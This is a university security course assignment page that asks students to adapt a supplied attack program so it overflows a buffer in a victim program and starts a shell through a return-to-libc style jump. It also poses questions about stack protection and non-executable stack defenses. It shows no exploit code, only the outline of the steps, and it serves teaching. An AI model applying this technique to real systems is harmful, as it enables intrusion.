CSE544 - Project #1 - Configure Buffer Overflow

Due Date: January 28, 2010.

In this assignment, you will configure an attack program to compromise a buffer overflow vulnerability in a victim program. The victim program is instrumented to provide traces that will be helpful in determining how to leverage that vulnerability. Your task will be to modify the attack program, based on the victim traces, to overflow the buffer and start a shell program.

Follow these instructions:

  1. Get the project tarball from here. The project tarball contains: (1) a victim program, cse544-victim.c, which contains a buffer overflow vulnerability and (2) an attack program, cse544-attack.c, which contains code to leverage buffer overflow vulnerabilities in victims.

  2. Instructions for what to do are provided in the slide deck: project 1 slides. These instructions are for development on a Linux system. Please use a Linux system for this. There are several Linux labs around campus, and you can use these machines remotely as well. This project does not require root access.

  3. In general, you need to: (1) configure the stack offset from the buffer to the return address (return address distance); (2) configure the new return address to launch a "jump-to-libc" style (note: we will jump to another function in the victim); and (3) write the necessary code to launch the exploit.

  4. Also, please answer the questions below associated with the assignment. Include the answers in an ascii file.

When you have completed the buffer overflow code, submit it via ANGEL by 5:00pm on the January 28. Make sure that you have tested your submission prior to uploading. We will build and run your attack (which launches the victim) to verify it. Failure to build either program may result in a failing grade for this assignment.

Questions

  1. Add the gcc flag -fstack-protector to the Makefile's STACK_FLAGS. What is the result? How is the stack changed? Please be precise in your description.

  2. Why is the protection offered by -fstack-protector not enabled by default? Name a useful functionality that this might prevent.

  3. Examine the victim's stack across runs and identify why it is not possible to perform an exploit by injecting code onto the stack. Identify the Linux mechanism that implements this defense. You will need to do some Google research.

You are to complete this on your own. Any sharing of code or help during the coding of this project is expressly forbidden. Do not discuss this project with anyone.


Trent Jaeger
Last modified: Apr 23 23:43:07 EST 2007